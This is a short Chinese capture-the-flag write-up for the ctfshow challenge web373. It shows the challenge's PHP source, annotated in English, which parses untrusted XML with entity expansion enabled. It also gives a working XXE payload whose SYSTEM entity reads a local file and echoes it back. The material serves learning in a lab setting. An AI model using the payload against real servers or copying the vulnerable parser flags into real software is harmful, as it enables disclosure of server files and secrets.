前置知识
参考WP
web373
// CTF challenge source (web373): parses the raw request body as XML with
// entity substitution enabled and echoes one element back, i.e. an XXE sink.
// Turn off all PHP error reporting, so parser warnings never reach the response.
error_reporting(0);
// Passing false explicitly (re-)enables libxml's external entity loader.
// The function is deprecated as of PHP 8.0.
libxml_disable_entity_loader(false);
// Raw request body, fully client-controlled; nothing validates it before parsing.
$xmlfile = file_get_contents('php://input');
// NOTE(review): file_get_contents() returns a string or false, never null, so
// isset() is always true here and this condition filters nothing.
if(isset($xmlfile)){
$dom = new DOMDocument();
// LIBXML_NOENT substitutes entity references with their values, and
// LIBXML_DTDLOAD loads the external DTD subset. On untrusted input these flags
// let a SYSTEM entity declared in the document's own DOCTYPE be resolved.
// A hardened parser passes neither flag (LIBXML_NONET also blocks network fetches).
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
// Re-wrap the already-parsed DOM as SimpleXML; entities were expanded by loadXML above.
$creds = simplexml_import_dom($dom);
// Child element <ctfshow> of the document's root element.
$ctfshow = $creds->ctfshow;
// Reflects the element's text (including any expanded entity content) into the
// response without escaping.
echo $ctfshow;
}
// Prints this script's own highlighted source on every request.
highlight_file(__FILE__);
payload（作为请求体提交；由于 loadXML 使用了 LIBXML_NOENT，&xxe; 会被替换为 file:///flag 的内容，并通过 echo $ctfshow 回显）：
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yn8rt>
<ctfshow>&xxe;</ctfshow>
</yn8rt>